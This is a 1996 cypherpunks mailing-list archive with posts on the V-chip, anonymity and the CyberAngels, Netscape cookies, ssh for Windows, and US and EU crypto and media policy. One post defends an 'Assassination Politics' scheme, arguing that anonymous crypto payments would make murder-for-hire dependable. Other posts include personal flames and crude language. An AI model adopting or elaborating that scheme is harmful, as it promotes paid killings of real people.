I cut the rest of your post because the main premise is not correct.  The
goal was not to create a sovereign government.  It clearly states in the
Declaration of Independence that the power belongs entirely to the people
and that the government is a group of officials who are elected to do the
bidding of the people.  They have what power we give to them
(theoretically, of course.  They don't seem to listen much, do they?).

sovereign n. 1. A person, governing body, etc., in whom the >supreme power
or authority is vested.<  adj. 1. Exercising or possessing supreme
authority or jurisdiction.  2. Independent, and free from external
authority or influence: a sovereign state.

This is not what our government is.  They are liable to us and the ultimate
power lies with us.  They are not independent and free from our influence.
The opening statements of the Declaration of Independence, before they get
to the complaints, outlines the the founding fasthers intentions in forming
a government of their own.  I have already quoted it in another post.
"...to institute new Government, laying it's foundation on such principles
and organizing it's powers in such form, as to them shall seem most likely
to effect their Safty and Happiness."  The government seems more intent on
_affecting_ our safty and happiness.

It's been said before and it will continue to remain true, the govt scares
up a new boogyman to frighten the public into giving it more power until
finally the people do not have enough power to take back the power thwy
gave to the govt.  Democracy becomes facism through fear.  What really
confuses me is how most people in this country do not understand the logic
behind this.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Tue, 13 Feb 1996 17:01:14 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <v01530501ad45eacd9a20@[204.179.169.57]>
MIME-Version: 1.0
Content-Type: text/plain


}At 07:20 AM 2/12/96 +0000, Deranged Mutant wrote:
}>> Parents had that ability before.  Cable boxes have a "perental control key"
}>> on the side that enables them to lock out "offensive" channels.  It works
}>> quite well and is fairly hard for the kidlets to defeat.  (I used it to
}>> lockout the religious stations and home shopping channels.)
}>
}>When I was a kid some friends down the street knew how to unlock the
}>Channel 100 XXX movies with a paper clip.  A V-chip would hopefully
}>be more sophisticated, but then again, so are today's kids...
}
}Sshhh!  You are not supposed to tell them that!
<rm>

}
}Yeah, I know it can be hacked.  I also know that if they are that interested
}in sex, NOTHING I do is going to stop them.  (Which is as it should be.  If
}they have no exposure to any sexual material as a youth, some rather nasty
}problems tend to crop up as adults. (Take a look at the studies of sexual
}predators.) But that is a point avoided by the moralists...)

<rm>

What's really funny here is that the harder you make it for kids to get
into something, the more they learn in order for them to get into it.
Parents who impose restrictions on their children using all sorts of
methods (hiding stuff, using the channel lock out deal, blah blah blah) are
challenging their children to use deduction and reasoning to get at what
they want.  In the case of the v-chip, channel lockout, site blocking
software, etc., the parents are turning their children into the most
horrendous creatures of all...OH!  Cypherpunks!

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Wed, 14 Feb 1996 12:57:10 +0800
To: cypherpunks@toad.com
Subject: CyberAngels
Message-ID: <v02140b00ad45ceaa91ca@[199.1.11.208]>
MIME-Version: 1.0
Content-Type: text/plain


Don't know if this has been mentioned on this list, since i'm, as usual, a
little behind on my reading.  I found this while out about this while
reading alt.religion.scientology.

The Guardian Angels have decided to enter cyberspace and make it safe for
us all.  They have a FAQ on the web - http://www.safesurf.com/cyberangels/
.  How is this relevant to cypherpunks?  From their FAQ:


"9) What kinds of changes would the Guardian Angels / CyberAngels like to see?

a) We would like to see an improvement in User identification. User ID is
impossible to verify or trace back. The very anonymity of Users is itself
causing an increase in rudeness, sexual abuse, flaming, and crimes like
pedophile activity. We the Net Users must take responsibility for the
problem ourselves. One of our demands is for more accountable User IDs on
the Net. When people are anonymous they are also free to be criminals. In a
riot you see rioters wearing masks to disguise their true identity. The
same thing is happening online. We would like to see User ID much more
thoroughly checked by Internet Service Providers."


Since i'm can't do emphasis in ascii well, i'll quote the interesting
sentence again -

"When people are anonymous they are also free to be criminals."

I've never been a fan of anonymity, but it does have it's legitimate uses.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 14 Feb 1996 05:33:17 +0800
To: ashfaq@corp.cirrus.com (Ashfaq Rasheed)
Subject: Re: To find the clock speed of a sun workstation
In-Reply-To: <199602130016.AA10339@sunstorm.corp.cirrus.com>
Message-ID: <199602130440.XAA19930@homeport.org>
MIME-Version: 1.0
Content-Type: text


The sysinfo program does this.  Don't recall how.  get a version later
than 2.2; earlier ones have bugs when installed setuid.

Ashfaq Rasheed wrote:

| Is there anyway of finding the clock speed of the CPU on a Sun workstation?
| As far as i know it can be found only by rebooting the machine and using
| module-info? And I believe that the module-info does a no-op loop for a
| a known number of times and calculates the time taken.
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 14 Feb 1996 12:57:20 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Cypherpunks vs. Coderpunks
In-Reply-To: <ad453be957021004ac4f@[205.199.118.202]>
Message-ID: <199602130502.AAA13406@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I wasn't going to mention this here, but...

Tim May writes:
> If you want to discuss coding, go over to Coderpunks and
> see if you have the magic password that gets you in. 

FWIW, I am (and have been) adding everyone who asks to subscribe to 
coderpunks, in spite of what the welcome message says. (I don't have control
over that :)  But the charter is much narrower than the cypherpunks list's;
I expect many cypherpunks subscribers wouldn't find the coderpunks traffic
particularly interesting. 

I volunteered for the dirty job of "enforcing" the charter by throwing 
people who ignore it off the list. This arrangement has the obvious 
disadvantage that I can capriciously eject people from the list. It has the
arguable advantage that I am willing and able to not-so-capriciously eject 
people from the list. Only time will tell whether this model will succeed or 
fail in some sense.  

If you want to join coderpunks, my life is made slightly easier if you
mailto:coderpunks-request@toad.com rather than sending directly to me.

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSAbISnaAKQPVHDZAQERqwf8D/TawTbHjw5WbJJGC6mfJn8U8k2zPwrK
PS6hWiFJEZlyBJAfgYoSpoSvnEAq/Ba1PxiivhX35cQqifsFbYrK7vF6DdTy1wQH
ic/KbJcuhS9HoPliJ4wPLZv43o+edhthiz0LiA8Z5EWXd9ux2Hik82Chk8xDDNTo
zElcUOt0XJZV2rbnjHGWe+jSuFCWsKAXKelNhZb012+TESePDT0OXSnmzh7NsTKV
4xMJIlf2Me1VmZGQv6a5KUuPaSOO9XThRcxXkRzGXfTkjKFTTaUCCEGFvtawUWLo
F+zOSWYUmTdadkMkfW6iIpNU1hnC2cHhCerqWQjwfyqnkkPfSRj/8A==
=5YD4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 14 Feb 1996 12:54:48 +0800
To: cypherpunks@toad.com
Subject: Re: COO_kie
In-Reply-To: <199602121615.LAA21849@pipe4.nyc.pipeline.com>
Message-ID: <312046BF.3C64@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> 
>    2-12-96. FinTim:
> 
>    "This bug in your PC is a smart cookie."
> 
>       Netscape Navigator contains a little-known wrinkle that
>       increases the power of companies to find out who their
>       customers are and what they are up to. It allows
>       companies to track which Web pages an individual looks
>       at, when, for how long, and in what order. The
>       information is stored on the customer's computer as
>       "persistent client-state hypertext transfer protocol
>       cookies".
> 
>    2-12-96. WSJ:

  There is a lot of confusion about cookies.  They do not allow
a web site to access private information such as the user's
e-mail address or other preferences as was recently reported
in Web Review.  They only store information that the web site
already has.  If you never give a web site private information
about you or your identity, they will not be able to match your
access patterns to your identity.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Tue, 13 Feb 1996 16:22:58 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Cypherpunks vs. Coderpunks [CORRECTION]
Message-ID: <199602130515.AAA13890@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I wrote:
> If you want to join coderpunks, my life is made slightly easier if you
> mailto:coderpunks-request@toad.com rather than sending directly to me.

<sigh>  the coderpunks-request address will work, but 
mailto:coderpunks-approval@toad.com is actually the address that prompts
Majordomo to send me a nicely formatted subscription template, and makes my
life a little easier. Sorry about the blather. I plead sleep deprivation. 

Futplex <futplex@pseudonym.com>		(Volunteer) Coderpunks Bouncer

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSAeNinaAKQPVHDZAQEYawf9HbnbJLfd9HnCp7hoYHoW6pMAm8fTgcmk
0SkAHoeUsh7neNwEtYAt+KTCv65fS3/YY5Tt8JmQ8D19q5tjjfggYuEfEdqC71FK
16WAKbDN66ucpQmdNkfWExafr4Cw+7jhW3VpJIByDIRdS9opLfK5VNwVETaRHstR
bBal9Cr397siQ9WsXYWfw7w3tLxg54T3NP/sXcyNHQ+C6ZJSxUXB1YEFossKCduf
cJp3KWfi2IKcD65fy05W164DQmtcL42iwkgHUQoCwilZYE+PEuAOTMqu26dfeTqu
iil9dLIEd7lEkHxlFU2ufHDCoSj89zO515FRV1/B+33T8bqzJt3OdA==
=a85O
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Wed, 14 Feb 1996 12:56:35 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks vs. Coderpunks
Message-ID: <199602130525.AAA24031@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May, an unelected spokesman of the Cypherpunk Ghetto (tm) wrote:
> Apparently the Cyphepunks list is thus being left to those of us who either
> don't want to code, or have no skills at coding, or who think the
> sociopolitical issues are more interesting.

I think you're misinterpreting what's going on.  Participants in the 
Coderpunks list are not generally abandoning Cypherpunks.  Some people
who have long been absent from the Cypherpunks list have joined it, but
I've seen posts from most of the Cypherpunk participants of Coderpunks 
on Cypherpunks since it was formed.

My concern is that the two lists will become more disjoint than they
already are.  I believe that the content of Cypherpunks is enhanced by having
the programmers present, just as the coders benefit from the guidance of seeing
the possibilities opened by their endeavors.

The remailers network is the most obvious example of the benefits of this synergy.
I'd hate to see us lose later rewards that could otherwise be reaped.

I don't believe that it'll be sociopolitical content that'll chase
the coders away: if the constant fighting over indisputable metaphysics
doesn't do it, the fighting over who was killfiled by whom first
and who's a total loon will.

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSAgvSoZzwIn1bdtAQE0CQF/Zk1TkLEnHKcBsi1IETtwqMP7y6oO6dmF
R3bAM7bpP2Rg4HphYkxEAIyo6zztkDrr
=jTwL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 14 Feb 1996 12:56:20 +0800
To: cypherpunks@toad.com
Subject: Internet Without Frontiers?
Message-ID: <Pine.BSD.3.91.960213001757.13044B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
     A 02 11 96 Reuter newsstory from Brussels, headlined 
     ---------------------------------------------------- 
 
         STRASBOURG MEDIA DEBATE HEADS FOR SHOWDOWN 
 
  reports: 
 
    ...the European Parliament in Strasbourg on Wednesday...
    hammers out new rules for the European Union's audio- 
    visual sector. 
 
 
  The EP may try to revise the 1989 law puffed as "television 
  without frontiers."  That law might be extended to govern 
  "new" services such as 
 
    ...teleshopping, the internet and pay television.... 
 
  
  Ach! and Sacre bleu!  Therefore-- 
 
     A coalition of 40 companies and trade associations from 
     the recording, advertising and technology industries has 
     written to parliamentarians...to urge them against extend- 
     ing rules to new services. 
 
 
  But there's another factor. 
 
    If the socialist demands for regulation of information high- 
    way services...prevail, the Parliament will then be set for 
    an almighty row with EU governments. 
 
 
  Why? 
 
    EU culture ministers agreed last November to keep current 
    rules unchanged. 
 
 
  It's cheaper to enlighten a few ministers, you see,  than it is 
  to enlist a whole gaggle of parliamentarians. 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The newsstory's www.nando.net online filename: 
 
                         info13_8187.html 
 
 
         This critical essay was composed 02 12 96. 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 14 Feb 1996 07:58:43 +0800
To: willer@carolian.com (Steve Willer)
Subject: Re: Free end-to-end encryption code?
In-Reply-To: <Pine.3.89.9602120956.C6693-0100000@dal1820.computek.net>
Message-ID: <199602122233.AAA06108@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> >Why reinvent the wheel?  Lots of end-to-end stuff out there - I use ssh, 
> >myself...
> 
> Okay...well...here's another problem. You see, most of the clients are
> going to be Windows people. I can't use a Unix-only solution.

There is already a windows version of ssh, though it is not very
stable.  I am myself working on an "official" Windows version, and it
should be available after a few weeks.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 14 Feb 1996 15:50:43 +0800
To: cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <m0tmGDL-0008ziC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 PM 2/11/96 -0800, Bill Frantz wrote:
>At 10:18 PM 2/11/96 -0800, Alan Olsen wrote:
>...
>
>>The v-chip will be less than useful as a real filter tool for those of us
>>who have a different worldview than the censors.
>
>Again, absolutely.  Hell, I can't even devise a filter that will let me
>filter out Jim Bell's rants while letting me see his reasoned arguments on
>anonymous assassination.  (I would love to have him address the Salman
>Rushdie issue, a man who is still alive despite a considerable announced
>price for his head.  There appear to be limits to who can be subject to
>assassination for pay.)

Since Olsen claimed to have filtered me out, I'm replying primarily for the 
benefit of the others on the list.

You mention the issue of Rushdie, as if it is some sort of refutation of my 
idea.   Quite the contrary; I think it actually supports me.

How so?, you ask?  Well, let's consider any potential assassin who might be 
interested in this "contract."  Aside from the obvious moral issues involved 
here (Rushdie has, presumably, done nothing to warrant his death), the truth 
is that such a potential assassin would see a number of problems that would 
strongly dissuade him from attempting to kill Rushdie.

1.  There is no way he could be assured that he could collect the award 
anonymously.  His name would certainly "get out," and then he would be 
subject not merely to "the law," but also anybody who wanted revenge for 
Rushdie's death.

2.   There is no way he could be assured that he would actually receive the 
award.  (How would he prove HE did it?)

3.  That's because there is no way he would enforce this "contract" should 
the offerer refuse to pay.


In other words, this situation is VASTLY different than the one that 
"Assassination Politics" would presumably be able to guarantee:

1.  The assassin would be absolutely anonymous; he would not have to trust 
ANYONE with knowledge of his guilt.

2.  The assassin would have a digital record of previous payoffs made by the 
organization in question, reassuring him that they actually will pay their 
debt.

3.  There will be no need to "enforce" such a contract; failure to pay will 
be provable in the "court of public opinion."  If the offering organization 
fails to pay, this failure will destroy its hard-earned credibility.


So you see, the Rushdie case is simply not any kind of disproof of 
"Assassination Politics":  if anything,it demonstrates WHY "murder for hire" 
in so rare and ineffective today, despite even a huge offer on a well-known
target.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joseph@genome.wi.mit.edu (Joseph Sokol-Margolis)
Date: Tue, 13 Feb 1996 16:34:00 +0800
To: ethridge@onramp.net
Subject: Re:  CyberAngels
Message-ID: <9602130546.AA22659@karlo>
MIME-Version: 1.0
Content-Type: text/plain


not sure if this is the right place.
I agree with allen, about the issues of 'nym. But looking at other aspects
of these cyberangels I'm unsure how to feel. On one hand they seem resonable,
protecting only the children. "Acts bewteen consenting adults are okay" say 
they. But the protect the children was what the CDA hid under.

--Joseph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 13 Feb 1996 16:36:49 +0800
To: cypherpunks@toad.com
Subject: Working Very Carefully
Message-ID: <Pine.BSD.3.91.960213004411.13044C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
      A 02 11 96 Bloomberg newsstory from Cannes, headlined 
      ----------------------------------------------------- 
 
              EUROPE'S ONLINE INDUSTRY TAKES SHAPE, 
                     COMPETITION HEATS UP 
 
  reports: 
 
   Even as they increase their subscriptions in Europe, online 
   services are beginning to work on the legal and social aspects 
   of the services they are providing. 
 
 
  How very thoughtful! 
 
  But what do they have in mind? 
 
  Jack Davies, president of AOL International, has the answer: 
 
   The issues involved are "bigger than a prosecutor in Ger- 
   many, bigger than just Germany, it's a global issue.  It in- 
   volves a legal structure that may not have kept up with the 
   technology and I think as an industry we have to work very 
   carefully through this issue." 
 
 
  Expanding from the Reich to the globe, what does Hans have in 
  mind? 
  
                   DEUTSCHLAND UBER ALLES! 
 
 
  But when it comes to contracting,...Jack's in charge. 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The newsstory's www.nando.net online filename: 
 
                       info12_8583.html
 
         This critical essay was composed 02 12 96. 
 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Wed, 14 Feb 1996 15:48:06 +0800
To: cypherpunks@toad.com
Subject: Re: Req. for soundbites
Message-ID: <199602130917.BAA01730@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: cypherpunks@toad.com]
[Subject: Re: Req. for soundbites]

It was written (in English) by bob bruen <bruen@wizard.mit.edu>:
   The four letter words that are considered indecent are an anachronism
   from the days when the French/Normans ruled England, (~1066-1300's).
   A quick look at the words and their acceptable counterparts will make
   clear the issue. The four letter word are all of English derivation and
   the socially acceptable ones are of French (sometimes Latin) derivation.
   Even the term "four-letter" is a derogatory term for the English language
   in general, because the French considered English second rate because the
   words tended to be short, unlike French. Anyone who supports the suppression 
   of these words is merely enforcing the old French repression of the English 
   and the English language from over 500 years ago. Why think for yourself 
   when tradition can do it for you?

    eg:
      to piss  - to urinate
      to shit  - to deficate
      to fuck  - to copulate
      cunt     - vagina 

So, what is the French-derived word for Motherfucker?
And, being nice and long, why isn't it acceptable?

:-) for the implicit-smiley-impaired mofos.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMR/TAYHskC9sh/+lAQGowQP+Jq3TPolK3C5pEeIHaypF8MyZSrnbxtbp
FpmVpXWw5ZqJ2txccSpTiykfE5gcANN6VeRh8N3xKJyxP3039qOQF+lpb1cAEcpF
oMU/BYUCAq3TzPboetL5dDXn6Z1OhogwQS6gv687l1gSedO6rtDBcltYft1YLjzc
WX5VSEpjDqs=
=o6E6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Feb 1996 18:44:48 +0800
To: Bruce Baugh <cypherpunks@toad.com
Subject: Re: Portland, OR, Key-Signing+
Message-ID: <m0tmH6j-0008xsC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 PM 2/12/96 -0800, Bruce Baugh wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>ANNOUNCING:
>THE SECOND QUASI-MONTHLY PORTLAND CYPHERPUNKS SOIREE AND KEY-SIGNING

>I really hate to add this particular paragraph (and it isn't in the
>version that'll get posted to newsgroups), but...one person won't be
>welcome. Jim Bell's conduct at the last meeting and on the list are
>such as to make it quite clear that I don't want him in my home.

Bullshit, Bruce!  My "conduct" at the last meeting was quite acceptable 
(nobody else complained, BTW) ; the source of the entire dispute that ensued 
was completely the irresponsible conduct of Alan Olsen in flaming me on the 
national cypherpunks list, and my only "crime" was objecting to his flames.  
I was, quite frankly, shocked that Alan Olsen would behave as badly AFTER
the meeting as 
he did.  NOTHING that happened AT THE MEETING prepared me for his later abuse.

It turns out, however, that he later incriminated himself by admitting to 
sending some anonymous flames on Cypherpunks to me; if anything you should 
be objecting to HIS behavior for this.  The fact that you are not is QUITE 
REVEALING.  (Clearly, Olsen was massively (and, at least on the record, at 
that time, secretly) strongly objecting to my political philosophy and ideas 
LONG BEFORE the meeting, yet he didn't have the guts to confront me before the 
meeting.)

Even you apparently admit this to be true, by virtue of remembering (now!) 
to carefully point out that material discussed at the meeting is "fair game" 
for future discussion on lists.  You're obviously trying to cover Olsen's 
ass on this matter by retroactively making it look like what Olsen did was 
somehow "acceptable".  For the record, I object:  Kow-towing to a few people 
by prohibiting cameras, yet flaming others (anonymously, no less!) for 
non-hostile commentary made at the first meeting makes Olsen look terrible, 
and defending him makes you look pretty bad.

Olsen's setting up a local Cypherpunks area, adding my name to the list, 
then removing my name when things got a bit too embarrassing is clearly his 
standard (mis)behavior; you appear to be adopting his policies and practices.

If you REALLY were well meaning, you would not tried to flaunt your 
rejection of me in a public message; you would have kept that part private.  
What you want to be able to do is to pretend that it is I who was at fault 
for Olsen's transgressions; you don't know newer attendees to hear both 
sides of the story.

How does it feel to be a sleazy character, Bruce?

Jim Bell

Klaatu Burada Nikto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 14 Feb 1996 15:44:08 +0800
To: PADGETT@hobbes.orl.mmc.com
Subject: Re:
Message-ID: <m0tmH6l-0008y1C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:03 AM 2/13/96 GMT, John Lull wrote:
>On Mon, 12 Feb 1996 13:41:04 -0500 (EST), Padgett wrote:
>
>> If it were properly and legally decided that communications 
>> with anon.penet.fi is against "national interest" then the sovereign has 
>> not only the "right" but the *duty* to block/monitor such communications.
>
>Bullpuckey.  One could just as legitimately say:
>
>  "If it were properly and legally decided that publication of the
>  Los Angeles Times is against "national interest" then the sovereign
>  has not only the "right" but the *duty* to block such publication."

"Right on", as they used to say.  Padgett's clueless.  He'll try to justify
ANYTHING.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@sub.rosa.com>
Date: Tue, 13 Feb 1996 18:28:40 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: Free end-to-end encryption code?
Message-ID: <10141420300269@compuvar.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:48 PM 2/12/96 +0000, you wrote:
>> Okay...well...here's another problem. You see, most of the clients are
>> going to be Windows people. I can't use a Unix-only solution.
>
>There exists at least one ssh Windows client.

Which was a beta that expired February 9th 1996...

There is another in the works...REAL SOON NOW(tm).


   Adam, Esq.

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 13 Feb 1996 14:46:23 +0800
To: cypherpunks@toad.com
Subject: DEA
Message-ID: <199602130154.CAA23267@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Column by Jim Dykes 
in the Knoxville Journal (423-584-9606), 2/8/96.


(...) I had a call the other day.  About the DEA.  Try to keep
all these damn acronyms straight:  DEA is Drug Enforcement
Agency.

Call was from an old cowboy - well, former Air America pilot, to
be more precise, CIA.  (There should be a federal agency to
control us old men better.)

To make a long, long story short, I have some names and phone
numbers of people around the country - Customs, Immigration &
Naturalization, maybe even some DEA, who can discuss rather
interesting money ripoff techniques by DEA agents involving Title
18, Title 21, and Title 19 of the Federal Code.  There was a time
when I would have busted a gut - and a phone budget - trying to
snare some bent government agents.  But, now ...

Let me make it perfectly clear that this old persimmon really
doesn't give a damn.  I am long past being shocked at venality
and corruption in public servants.  But, if anybody wants to be a
hotshot investigative reporter (and run up a helluva phone bill
for his or her employer) just give me a call.  (That lets a lot
of you out, since it would have to be somebody I know and trust.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 13 Feb 1996 19:32:36 +0800
To: gnu@toad.com
Subject: Stewart Baker's web site & OECD international crypto policy
Message-ID: <9602131116.AA09688@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Stewart used to be General Counsel for NSA.  He retired to move into
private law practice with Steptoe & Johnson.  He has a variety of
short papers on encryption, network law & policy available on his
law firm's web site, http://www.us.net/~steptoe/.

My favorite was his summary report on the OECD meeting in December,
~steptoe/286908.htm, at which the US tried to parade some of the
fruits of its behind-the-scenes efforts to convince other governments
to become as authoritarian as the US government on crypto policy.

If the US government can quietly convince other countries to support
Clipper-like systems (including "mandatory key escrow" and "trusted
third parties") then they can say, "See, this is a real problem -- all
these other countries are having to deal with it too."  Of course, if
their covert US efforts to stir these people up become widely known, the
technique will have less impact.

The US government's efforts have failed to convince citizens and
industry that there's a problem, when they won't tell us what the
problem is but assure us that it's a really big problem.  Our own
government is now colluding with other governments -- against us and
their own citizens -- in a joint attempt to attempt to rob the
ordinary people of the world of our rights to privacy, free speech,
and free assembly.

It would be interesting to see notes from other participants in the
same OECD meeting(s).  Another 1-hour meeting was scheduled in
Canberra on Feb 9.  Anyone know what happened there?

	John Gilmore
--
Love your country but never trust its government.
		     -- from a hand-painted road sign in central Pennsylvania




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 14 Feb 1996 15:50:52 +0800
To: gnu@toad.com
Subject: AT&T Public Policy Research -- hiring for cypherpunks issues
Message-ID: <9602131121.AA09899@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 12 Feb 1996 17:02:39 -0500 (EST)
From: Paul Resnick <presnick@research.att.com>
To: gnu@eff.org

Last July, we started a new Public Policy Research department at
AT&T. We're writing to ask if you have friends, students, or colleagues
who could contribute to this new enterprise. We are looking both for
software hackers and for Ph.D. level researchers who are comfortable
with software but bring expertise in economics, politics, law, or
sociology. There is also an opening for a senior researcher with strong
management skills to head the department.

We're very excited about the prospects for this department. The
fundamental premise is that communication systems can provide the glue
that holds society together, in many cases more effectively and less
intrusively than governments can. We will explore the interplay of
software tools, rules, and rewards, as means of governance in electronic
markets and other virtual public spaces. In other words, how can we make
it safe, fun, and profitable to interact with people you do not know
very well?

Throughout the company, there is untapped energy that lingers from the
days when AT&T had a clear public mission of universal telephone service
